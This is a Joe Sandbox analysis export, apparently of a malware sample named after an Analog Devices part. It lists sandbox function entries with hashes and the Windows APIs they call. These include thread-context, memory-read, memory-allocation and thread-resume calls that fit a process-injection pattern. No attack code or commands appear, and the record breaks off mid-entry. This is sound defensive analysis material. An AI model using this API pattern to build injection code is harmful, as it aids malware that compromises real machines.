Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: c4757852c6f8312f6caa6f8b99c6ac6f8aec1d896068b98aa20dedfb05bf56cb
Instruction ID: 200d14d6b3adbcde8207cad93e87d9a01b98929fab1bb87b978584c436b117f5
Opcode Fuzzy Hash: c4757852c6f8312f6caa6f8b99c6ac6f8aec1d896068b98aa20dedfb05bf56cb
Instruction Fuzzy Hash: F521A0B5D012099FDB10CF9AD884A9EFBF5FB58320F24842AE919A7310D775A944CFA0

Function 09CD11C8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09CD124E

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7f7f82d47eae4b09368dc8253811eeb2ba6de4140113cad3f2683ca5ac0fac2a
Instruction ID: 5aa6c06bb5318d41a7c38fe40732a062756c00927d013d653bf03286667ec441
Opcode Fuzzy Hash: 7f7f82d47eae4b09368dc8253811eeb2ba6de4140113cad3f2683ca5ac0fac2a
Instruction Fuzzy Hash: 292134B1D003098FDB14CFAAC4817EEBBF4AF88324F14842AD559A7251C7789A45CFA0

Function 09CD1452 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09CD14D8

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 1e3c8bbd6def3f1464498340f8aeac245f387ebf7ee084460672f952e6ef30f8
Instruction ID: 8e3878348e8f28697278a13d88aacb5f543a15aabe797fe1c6ef98f045aee03b
Opcode Fuzzy Hash: 1e3c8bbd6def3f1464498340f8aeac245f387ebf7ee084460672f952e6ef30f8
Instruction Fuzzy Hash: 5C2116B1D013499FCB14CFAAC881AEEBBF5FF88320F14842AE519A7250C7789901DB60

Function 09CD11D0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09CD124E

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e98b2edbb5177ed827c48799d503cfeaf58156ecb275024ab89c503a63b065f0
Instruction ID: e04468ea71986510aa0a0fd43d6dc00425f2798b57e328bbc14fe11972ef3a72
Opcode Fuzzy Hash: e98b2edbb5177ed827c48799d503cfeaf58156ecb275024ab89c503a63b065f0
Instruction Fuzzy Hash: 612138B1D003098FDB14DFAAC4857EEBBF4EF88324F14842AD559A7241C778A945CFA1

Function 09CD1458 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09CD14D8

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f30e4f7fc634e464949cea4e4ec9f2faaef35598bd0202c0fc7879aa30b8908a
Instruction ID: 6004c8cb3a2867482eb27e89ea40adbea0386da0f82ce73901e7db8bde9f2f8c
Opcode Fuzzy Hash: f30e4f7fc634e464949cea4e4ec9f2faaef35598bd0202c0fc7879aa30b8908a
Instruction Fuzzy Hash: 8B2139B1D003499FCB10DFAAC881ADEFBF5FF48320F14842AE518A7250C778A900DBA1

Function 09CD12A0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09CD1316

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5bbe575b7c8fc5a6756358688501dfa24a57c6c6e029c2af1cd3daee2b3c512c
Instruction ID: 8df9232f962a2f18763c61cea941a0dff457be80a6d13a4bcf18f270f2e93fe5
Opcode Fuzzy Hash: 5bbe575b7c8fc5a6756358688501dfa24a57c6c6e029c2af1cd3daee2b3c512c
Instruction Fuzzy Hash: DF1186B1D002098FCB24DFA9D845AEEBFF5EF88320F24841AE519A7210C775A941DFA0

Function 07B569CC Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07B5971A,?,?,?,?,?), ref: 07B597BF

Memory Dump Source

Source File: 00000000.00000002.1854631461.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b50000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: ae80590cdd599e8a341e1675649e45ee54f3d3d9d3838eebf62f9ca6407f4ad7
Instruction ID: 481e7f572b6bacf4f63d09e222ccb47496611b63233f8201c48d9a4e6da5e8fc
Opcode Fuzzy Hash: ae80590cdd599e8a341e1675649e45ee54f3d3d9d3838eebf62f9ca6407f4ad7
Instruction Fuzzy Hash: B6113AB5800349DFDB10CF9AC844BDEBFF8EB48720F14845AE914A7210C375A950DFA4

Function 09CD12A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09CD1316

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e93f5b765495e3b4a1f0cfa60fd6354cb6c33fd283ce4c632a5344c30bd1fba8
Instruction ID: 03de873325d0bf5085643b3a8a68337f1f2d8923d46019a5bdc288568a20bc3d
Opcode Fuzzy Hash: e93f5b765495e3b4a1f0cfa60fd6354cb6c33fd283ce4c632a5344c30bd1fba8
Instruction Fuzzy Hash: FB1137B19002499FCB20DFAAD845ADFBFF5EF88320F24841AE519A7250C775A950DFA1

Function 09CD1118 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09CD1182

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8b6d248b07016e2e8f532be55b0f90fc6967d6a2e09c89074990fd73a4761ef2
Instruction ID: 56ecd2ac5be1d55f4e5b67494ce97152d9c80821f9f0cbe02b94ca26e4cf8b55
Opcode Fuzzy Hash: 8b6d248b07016e2e8f532be55b0f90fc6967d6a2e09c89074990fd73a4761ef2
Instruction Fuzzy Hash: FC1167B1D002498ECB24CFA9C4457EEFFF4EF88320F24841AD519A7210C7756900CB90

Function 09CD1120 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 09CD1182

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 32295bddc8819068d8698a31bd80fa07052484168c6f65833ead37a3c97431d0
Instruction ID: e3a9164b2218eef9d729e535d360d65afbe4d32a6252fd4c37b812410703efab
Opcode Fuzzy Hash: 32295bddc8819068d8698a31bd80fa07052484168c6f65833ead37a3c97431d0
Instruction Fuzzy Hash: 161128B1D003498FDB24DFAAC4457EEFBF5EB88324F248419D519A7240CB79A940CB91

Function 09CD38C9 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 09CD392D

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 10b2d3ca494465d332b6423582d696534e3362f5ce02cb986cb942becfbaa512
Instruction ID: 477c593d045b5e3abe9d4420f561e52c02997d1be9cdc51d6c51f5d5ad474650
Opcode Fuzzy Hash: 10b2d3ca494465d332b6423582d696534e3362f5ce02cb986cb942becfbaa512
Instruction Fuzzy Hash: 6311F5B5800349DFCB20DF99D985BDEBFF4EB48724F20841AD555A7210C3756554CFA1

Function 09CD38D0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 09CD392D

Memory Dump Source

Source File: 00000000.00000002.1856859677.0000000009CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9cd0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 39338e3e1a262dcd33156ebe73d641f529f54150d5a6f0cc9ad58e62d1da237c
Instruction ID: 7d6022621ab7d858f111d6adce99b0ca66ab0a72ea295ec279cd15ef57d95ff4
Opcode Fuzzy Hash: 39338e3e1a262dcd33156ebe73d641f529f54150d5a6f0cc9ad58e62d1da237c
Instruction Fuzzy Hash: 0F11F2B58002499FCB10DF9AD885BDEBBF8EB48724F20841AE518A7200C375A944CFA5

Function 0B24AEE8 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

Tefq, xrefs: 0B24AF3D

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Tefq
API String ID: 0-1066582953
Opcode ID: f14a6cb838c3518d92f2df5f5e2fadf6c6e2b72b886f829f06dc739d33b9a609
Instruction ID: 41ae3add8fe2e4623f1a8bbfb9e085ed1d5f7c12dd24f6ba4d2353a32fd3a0c5
Opcode Fuzzy Hash: f14a6cb838c3518d92f2df5f5e2fadf6c6e2b72b886f829f06dc739d33b9a609
Instruction Fuzzy Hash: B841F6B4E55208CFDB08CFE5D584AADBBB6FF49300F109029E929AB765D7315806CF40

Function 051FE060 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

Hjq, xrefs: 051FE071

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Hjq
API String ID: 0-3368716452
Opcode ID: f1f16d14e6b7971c039021d72ef74274a21b611df9ffb96cfe95886549221d83
Instruction ID: 5c0b92e4142ff1781ab3cacc8aebd15cf3be08f288aab8e15d270bc1314c823b
Opcode Fuzzy Hash: f1f16d14e6b7971c039021d72ef74274a21b611df9ffb96cfe95886549221d83
Instruction Fuzzy Hash: B731F575A002099FCB05DFA4D9459AEBBB6FF89300F144569F102A73A5DF349845CB80

Function 0B24AE73 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

Tefq, xrefs: 0B24AF3D

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: Tefq
API String ID: 0-1066582953
Opcode ID: 927faba124e976dd4845e8b193f69cdad501fb2caef629abb1c3853d2d01fdb0
Instruction ID: 4ac0ee95c0a8cc6d8df990893b3433dd996f04fc006775586ce3a06520bd17e1
Opcode Fuzzy Hash: 927faba124e976dd4845e8b193f69cdad501fb2caef629abb1c3853d2d01fdb0
Instruction Fuzzy Hash: B04113B4E55209CFCB08CFA9C5809EDBBB5FF49310F209029E92AAB765C7319942CB50

Function 0B241470 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

OijW, xrefs: 0B241529

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: OijW
API String ID: 0-3475513506
Opcode ID: 582f75f93ca423e0b69caeb50ff2cc4f9dce498a3ce5633ec471166f183a718d
Instruction ID: 6fc73c71204438ffc5f55a8dc7ff13e1660ca6500bba6f2251e0a0ccae4ed4f0
Opcode Fuzzy Hash: 582f75f93ca423e0b69caeb50ff2cc4f9dce498a3ce5633ec471166f183a718d
Instruction Fuzzy Hash: 7A31F8B4E1420ADFCB48CFA9C481AAEBBF1FF89311F11846AC819A7714D3749A51CF51

Function 0B243181 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

?H,a, xrefs: 0B2431C7

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: ?H,a
API String ID: 0-4093759987
Opcode ID: cd2b4d414e73cce8a4ed4003315e38ed7ed65ec0aa3d5485df13546f4899c74c
Instruction ID: 7c81b2d48a45b9ce443a0bb3d3cbe190579db73de782ec959f0382b0a71e09e5
Opcode Fuzzy Hash: cd2b4d414e73cce8a4ed4003315e38ed7ed65ec0aa3d5485df13546f4899c74c
Instruction Fuzzy Hash: 80213974E15108EFDB48DFA9C985A9EFBF2EF89300F24C5AAD51997264D770DA01CB04

Function 0B247EA8 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

u|P, xrefs: 0B247EDF

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: u|P
API String ID: 0-1764873574
Opcode ID: 58d5bfc926b875b7e44842dcf3d6de719dbdf881d0e4f56ec39bbbca63c40375
Instruction ID: 1d2f0d608e7327672c22b4e3ba6e1d64f170a5287c0b7f5567cbd4c8b76d57a4
Opcode Fuzzy Hash: 58d5bfc926b875b7e44842dcf3d6de719dbdf881d0e4f56ec39bbbca63c40375
Instruction Fuzzy Hash: 84112EB4E15209DFCB08CFA9C58159EBBF2EB88300F20C06A8519A3354D7349F41CB45

Function 0B245E80 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

G'/., xrefs: 0B245EF6

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: G'/.
API String ID: 0-3562003039
Opcode ID: c99a36a44b737cc2471fe6471222b118733e2ebb686e5340e198ac50827251f6
Instruction ID: 0078e2d548cae50e78c3e2dc2b9d2f1cc27c7e0429cbfad072642ccaac9bc569
Opcode Fuzzy Hash: c99a36a44b737cc2471fe6471222b118733e2ebb686e5340e198ac50827251f6
Instruction Fuzzy Hash: 9101DF70E26208DFCB08DFA4D68495DFAB6EB9A300F20D475C549A3294E7309E51CB01

Function 0B24E991 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

x(6, xrefs: 0B24E99A

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID: x(6
API String ID: 0-1230072294
Opcode ID: a04aeb217adcd54fb1c92396d0430bc83f3a4b03efd411db7d714b5b6ca43e63
Instruction ID: 907a4e670cbca36a31c64f80b6a5c0d2b15314bd2690353761220f7d7937314f
Opcode Fuzzy Hash: a04aeb217adcd54fb1c92396d0430bc83f3a4b03efd411db7d714b5b6ca43e63
Instruction Fuzzy Hash: 3FD022B0A081048FCB059B28C48058D3FBCFF55300F069905C010D3222D6300C0ACF41

Function 051FB238 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfb978eeeef8e55eca470362887e14abd99c075fbea05a1153b3dd40f366c833
Instruction ID: dc45d42fe070b73a2a3f311773e090731d1b96ea541fdbed5271c46a031dacd1
Opcode Fuzzy Hash: cfb978eeeef8e55eca470362887e14abd99c075fbea05a1153b3dd40f366c833
Instruction Fuzzy Hash: EF716D30E04609CFDB14DFB9C858AADBBB2FF89300F158529E516A7391EF34A985CB50

Function 051FD8C8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 463f218db8578ae100ff58ef6adb5c9fa34dd1bc24ded0c957635988a309f627
Instruction ID: e12d451a05e08ff8bb02e5d0af930b27e457d76adc0f4668e38bb9dc4b46ea34
Opcode Fuzzy Hash: 463f218db8578ae100ff58ef6adb5c9fa34dd1bc24ded0c957635988a309f627
Instruction Fuzzy Hash: A4518E307042049FDB14EB69D598BAAB7F6BF88204F144569E60ADB3A2CF75ED41CB90

Function 051FD8A0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e324872b6ef21dabf519ec6db8c660d546fa4aa726b95860a720a10d78224c9f
Instruction ID: 3fc97eaf237444683971729b81685c278a5efec1a1463acf59f68b8c9434aa49
Opcode Fuzzy Hash: e324872b6ef21dabf519ec6db8c660d546fa4aa726b95860a720a10d78224c9f
Instruction Fuzzy Hash: 6651AD307042059FDB19EB68D498BB9BBF6BF89300F15446DD60A9B362CB75ED41CB90

Function 0B24C6D3 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bfd8e9575a42e0bf72bc1aff3518f50152ef3019c417c4b52c14374f696d733
Instruction ID: 63382286ef1852a285e05466562dd2836ee78268971a63bb4c42dbb19bdbfe73
Opcode Fuzzy Hash: 9bfd8e9575a42e0bf72bc1aff3518f50152ef3019c417c4b52c14374f696d733
Instruction Fuzzy Hash: B9414874D2A208EFCB09CFADD4845EDBBBAFF8E301B00D466D42AA6651C7749942CF50

Function 051FD7BC Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d69b6b80658ad7c9b1069e5fa3911abf9494e64288f0b8d78ea14f40947a9f8
Instruction ID: afaa33ec4364f90abe1ddaba4bae87f85328688599833d8d9e249b7ce5172f94
Opcode Fuzzy Hash: 1d69b6b80658ad7c9b1069e5fa3911abf9494e64288f0b8d78ea14f40947a9f8
Instruction Fuzzy Hash: 28318374E02218DFCB14DFA4F5989ADFBB2FF84301F118569E55267291CB709C66CB40

Function 0B24B5B8 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5add0a6a4bf1c5f955b5e825a43dbfba4e353d90294829ed3092c5b8bbd8fa5b
Instruction ID: 0b9d8bb3bd82b569dc17e510619fc6591198b4f0575da6a7481643f2cf204c3c
Opcode Fuzzy Hash: 5add0a6a4bf1c5f955b5e825a43dbfba4e353d90294829ed3092c5b8bbd8fa5b
Instruction Fuzzy Hash: 41412874D29209CFDB08CFAAD4986FEBBF6AB8D300F14E069D429A7251D7708941CF64

Function 051FDC00 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 501cb495d06b3feec2c23d27f42f04d5a85dcffd021ebeeb7569a5471ba1f561
Instruction ID: 2dd364be142792287e0c14032ee6f38d4e9c3532c9f8a979422a5b5aa51da4b3
Opcode Fuzzy Hash: 501cb495d06b3feec2c23d27f42f04d5a85dcffd021ebeeb7569a5471ba1f561
Instruction Fuzzy Hash: 9D41A3B4E002188BDF28EF74E0946BDBBB2EF88354F144829D602B7395DF758981DB91

Function 051FACF8 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2103b72b49d345d11d332d7058ea8b1725a9549dbeacc588c8abe04ee81b2e4
Instruction ID: 4e326365bbe2b63b157ddd4d5db0d769a6cc0f32fe067f4acfb5fe8c23044fa1
Opcode Fuzzy Hash: f2103b72b49d345d11d332d7058ea8b1725a9549dbeacc588c8abe04ee81b2e4
Instruction Fuzzy Hash: 6241F934B042188FDB54EB68C844BDDB7B1FF88715F114069EA06AB3A2DB79E841CF60

Function 051FDBF0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feefc6c5cc6d6a41de536c17e49f2efbc6a76d028a8f73cdc6afd55491c04dd7
Instruction ID: eabc9902cbe624aab0347a577cdb26a281ffba0714f54568aed77451fea13a48
Opcode Fuzzy Hash: feefc6c5cc6d6a41de536c17e49f2efbc6a76d028a8f73cdc6afd55491c04dd7
Instruction Fuzzy Hash: 463106B4E042058BDF28EF74E0947BD7BB2EF88354F10482DC602AB295DF758981DB92

Function 0B245284 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50279426cbf29f758fecbe63d0a99d0fa6a12e40fae757d5805a728dc94e79d
Instruction ID: bc564e6011839e5628ba9cdaedb49670e0ffdf1e4ad70285a46a5cebbc88e3f2
Opcode Fuzzy Hash: b50279426cbf29f758fecbe63d0a99d0fa6a12e40fae757d5805a728dc94e79d
Instruction Fuzzy Hash: 81315CB19102099FCB14DFA9D885A9EBFF5FF49314F10846AE819E7310D775A910CFA0

Function 0B24B5A8 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7f93848e4947eede072aee735a10be07b96a49f9c3a97d65723bec5af7db150
Instruction ID: abcf1e8911dfd0d4379792d757e0ecce28f2580d45135da4e8d5a9e5a083244b
Opcode Fuzzy Hash: e7f93848e4947eede072aee735a10be07b96a49f9c3a97d65723bec5af7db150
Instruction Fuzzy Hash: C5312AB4D192088FDB08CFAAD4886EEBBF6AF8D301F14E06AD429A3251D7708941CF14

Function 051FD718 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fbf2788f4d475e9a07ed69a7c2e5e27e970e1a8ef87e6d56fd0c089bf1ee3f7
Instruction ID: a377ee2013a6a1b5306e9405a62f24313506722a96fefd0724f3461e5cad7001
Opcode Fuzzy Hash: 1fbf2788f4d475e9a07ed69a7c2e5e27e970e1a8ef87e6d56fd0c089bf1ee3f7
Instruction Fuzzy Hash: 6441BCB0D003589FDB14CF9AC984A9EFBB5BF88714F20862AE419AB264D7746845CF90

Function 0B248700 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfa5200fbc85a487add39714a3ff751e644c5d92d33e495d31d0be1571b2b3a2
Instruction ID: 7ffed38c485f00eee5db8f93c03148a3b5379b7d7d1878360cd47169b1f3a27e
Opcode Fuzzy Hash: dfa5200fbc85a487add39714a3ff751e644c5d92d33e495d31d0be1571b2b3a2
